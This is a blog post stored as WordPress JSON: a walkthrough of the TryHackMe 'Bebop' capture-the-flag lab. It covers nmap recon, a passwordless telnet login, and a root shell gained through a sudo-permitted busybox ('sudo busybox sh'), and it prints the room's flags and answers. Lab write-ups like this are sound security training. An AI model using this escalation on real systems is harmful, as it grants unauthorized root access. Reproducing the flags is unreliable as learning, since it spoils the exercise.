{"id":1835,"date":"2025-03-05T15:50:35","date_gmt":"2025-03-05T20:50:35","guid":{"rendered":"https:\/\/www.peteonsoftware.com\/?p=1835"},"modified":"2025-03-05T15:50:35","modified_gmt":"2025-03-05T20:50:35","slug":"tryhackme-room-walkthrough-bebop","status":"publish","type":"post","link":"https:\/\/www.peteonsoftware.com\/index.php\/2025\/03\/05\/tryhackme-room-walkthrough-bebop\/","title":{"rendered":"TryHackMe Room Walkthrough: Bebop"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/peteonsoftware.com\/images\/2025\/bebop.jpg\" alt=\"An evil drone, representing the drone in this exercise\" title=\"An evil drone, representing the drone in this exercise\" style=\"float:left;margin:.5rem;\">Today, we&#8217;re going work our way through another TryHackMe room called <a href=\"https:\/\/tryhackme.com\/room\/bebop\">Bebop<\/a>.  This one isn&#8217;t in the Free Tier, but it is considered &#8220;Easy&#8221; and is a &#8220;Walkthrough Room&#8221; rather than a &#8220;Challenge Room&#8221;.  Because of that, there will be some additional questions in addition to just posting User and Root flags.  Getting started, the room description says, &#8220;Who thought making a flying shell was a good idea?&#8221;.  For the first task, it reads, &#8220;For this mission, you have been assigned the codename &#8216;pilot&#8217;.  Press the Start Machine button to make the drone takeoff!&#8221;.<br \/>\n<br style=\"clear:both;\"><\/p>\n<h3>Task 1<\/h3>\n<p><strong>&#8220;Deploy the machine.&#8221;<\/strong> &#8211; <em>No answer needed<\/em><br \/>\n<strong>&#8220;What is your codename?&#8221;<\/strong> &#8211; <em>pilot<\/em><\/p>\n<h3>Task 2<\/h3>\n<p>With the machine started and enough time elapsed, I first ran an nmap scan to see what we were dealing with.<\/p>\n<pre>\r\n~# nmap -sCV -T4 10.10.194.21\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2025-03-05 16:25 GMT\r\nNmap scan report for 10.10.194.21\r\nHost is up (0.0013s latency).\r\nNot shown: 998 closed ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)\r\n| ssh-hostkey: \r\n|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)\r\n|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)\r\n|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)\r\n23\/tcp open  telnet  BSD-derived telnetd\r\nMAC Address: 02:D4:65:95:48:91 (Unknown)\r\nService Info: OS: FreeBSD; CPE: cpe:\/o:freebsd:freebsd\r\n\r\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\r\nNmap done: 1 IP address (1 host up) scanned in 15.44 seconds\r\n<\/pre>\n<p>So, ports 22 (SSH) and 23 (telnet) are open.  SSH is rarely the initial way in without any other information, so let&#8217;s try telnet, remembering our username of pilot that they&#8217;ve already told us and then asked us about.  Connecting, I was asked for a login and I typed <em>pilot<\/em>.  This immediately got me to an interactive session.  So, they meant <strong>Easy<\/strong> easy on this one.<\/p>\n<pre>\r\nroot@ip-10-10-235-128:~# telnet 10.10.194.21\r\nTrying 10.10.194.21...\r\nConnected to 10.10.194.21.\r\nEscape character is '^]'.\r\nlogin: pilot\r\nLast login: Sat Oct  5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net\r\nFreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019\r\n\r\nWelcome to FreeBSD!\r\n\r\nRelease Notes, Errata: https:\/\/www.FreeBSD.org\/releases\/\r\nSecurity Advisories:   https:\/\/www.FreeBSD.org\/security\/\r\nFreeBSD Handbook:      https:\/\/www.FreeBSD.org\/handbook\/\r\nFreeBSD FAQ:           https:\/\/www.FreeBSD.org\/faq\/\r\nQuestions List: https:\/\/lists.FreeBSD.org\/mailman\/listinfo\/freebsd-questions\/\r\nFreeBSD Forums:        https:\/\/forums.FreeBSD.org\/\r\n\r\nDocuments installed with the system are in the \/usr\/local\/share\/doc\/freebsd\/\r\ndirectory, or can be installed later with:  pkg install en-freebsd-doc\r\nFor other languages, replace \"en\" with a language code like de or fr.\r\n\r\nShow the version of FreeBSD installed:  freebsd-version ; uname -a\r\nPlease include that output and any error messages when posting questions.\r\nIntroduction to manual pages:  man man\r\nFreeBSD directory layout:      man hier\r\n\r\nEdit \/etc\/motd to change this login announcement.\r\nWant to strip UTF-8 BOM(Byte Order Mark) from given files?\r\n\r\n\tsed -e '1s\/^\\xef\\xbb\\xbf\/\/' < bomfile > newfile\r\n[pilot@freebsd ~]$ \r\n<\/pre>\n<p>Doing an <em>ls<\/em> shows me that we can see the user.txt file in our directory and <em>cat<\/em>-ing it out gives us the first answer of Task 2.<br \/>\nOkay, so we&#8217;re already at a command prompt.  No issues here.  <\/p>\n<pre>\r\n[pilot@freebsd ~]$ ls\r\nuser.txt\r\n[pilot@freebsd ~]$ cat user.txt\r\nTHM{r3m0v3_b3f0r3_fl16h7}\r\n<\/pre>\n<p><strong>What is the User Flag?<\/strong> &#8211; <em>THM{r3m0v3_b3f0r3_fl16h7}<\/em><\/p>\n<p>Moving on, we need to see what we can do to elevate our privileges to root to get the root flag.  One of the first things I usually do is <em>sudo -l<\/em> to see what we can run as <em>sudo<\/em>.  Since we didn&#8217;t use a password to log in, we didn&#8217;t know the password if there was one.  Luckily, it didn&#8217;t ask us one to run this command.<\/p>\n<pre>\r\n[pilot@freebsd ~]$ sudo -l\r\nUser pilot may run the following commands on freebsd:\r\n    (root) NOPASSWD: \/usr\/local\/bin\/busybox\r\n<\/pre>\n<p>Okay, so we can run the binary <em>busybox<\/em> with <em>sudo<\/em> as root with no password.  Is that useful?  This is where I check my favorite PrivEsc companion GTFOBins to see.  You can find the entry for <em>busybox<\/em> <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/busybox\/\">here<\/a>.  Taking a small aside, <em>busybox<\/em> is a utility that you often find in embedded systems that contains its own implementations of things like <em>ls<\/em>, <em>sh<\/em>, <em>mv<\/em>, etc.  In these systems, you can execute the commands by calling <em>busybox {command}<\/em>, or &#8211; quite often &#8211; the person who set up the system will symlink <em>ls<\/em> to just call <em>busybox ls<\/em>, like this: <em>ln -s \/bin\/busybox \/bin\/ls<\/em>, so you might not even know that <em>busybox<\/em> is involved.  This would allow you to only have one binary instead of many, with an overall size savings.  <\/p>\n<p>In this case, that means if I call <em>sudo busybox sh<\/em>, I&#8217;ll get a shell opened as root, which is just what happened.<\/p>\n<pre>\r\n[pilot@freebsd ~]$ sudo busybox sh\r\n# whoami\r\nroot\r\n<\/pre>\n<p>From there, we navigate to the root directory and <em>cat<\/em> out the file.<\/p>\n<pre>\r\n# cd \/root\r\n# ls\r\n.bash_history\t.history\t.login\t\troot.txt\r\n.cshrc\t\t.k5login\t.profile\r\n# cat root.txt\r\nTHM{h16hw4y_70_7h3_d4n63r_z0n3}\r\n<\/pre>\n<p><strong>What is the Root Flag?<\/strong> &#8211; <em>THM{h16hw4y_70_7h3_d4n63r_z0n3}<\/em><\/p>\n<h3>Task 3<\/h3>\n<p><strong>What is the low privilleged user?<\/strong> &#8211; <em>pilot<\/em><br \/>\n<strong>What binary was used to escalate privileges?<\/strong> &#8211; <em>busybox<\/em><br \/>\n<strong>What service was used to gain an initial shell?<\/strong> &#8211; <em>telnet<\/em><\/p>\n<p>Last question, we already knew from what we saw in our nmap scan and also at the dump of information at our login prompt, but you can always check this way from within the system itself.<\/p>\n<pre>\r\n# uname -a\r\nFreeBSD freebsd 11.2-STABLE FreeBSD 11.2-STABLE #0 r345837: Thu Apr  4 02:07:22 UTC 2019     root@releng2.nyi.freebsd.org:\/usr\/obj\/usr\/src\/sys\/GENERIC  amd64\r\n<\/pre>\n<p><strong>What Operating System does the drone run?<\/strong> &#8211; <em>FreeBSD<\/em><\/p>\n<p>That&#8217;s it.  The most basic of rooms, but a pretty good entry point into some basic recon and basic PrivEsc if you&#8217;re new to this.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today, we&#8217;re going work our way through another TryHackMe room called Bebop. This one isn&#8217;t in the Free Tier, but it is considered &#8220;Easy&#8221; and is a &#8220;Walkthrough Room&#8221; rather than a &#8220;Challenge Room&#8221;. Because &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[153],"tags":[142,149,134],"class_list":["post-1835","post","type-post","status-publish","format-standard","hentry","category-capture-the-flag","tag-infosec","tag-offensive-security","tag-security"],"_links":{"self":[{"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/posts\/1835","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/comments?post=1835"}],"version-history":[{"count":0,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/posts\/1835\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/media?parent=1835"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/categories?post=1835"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/tags?post=1835"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}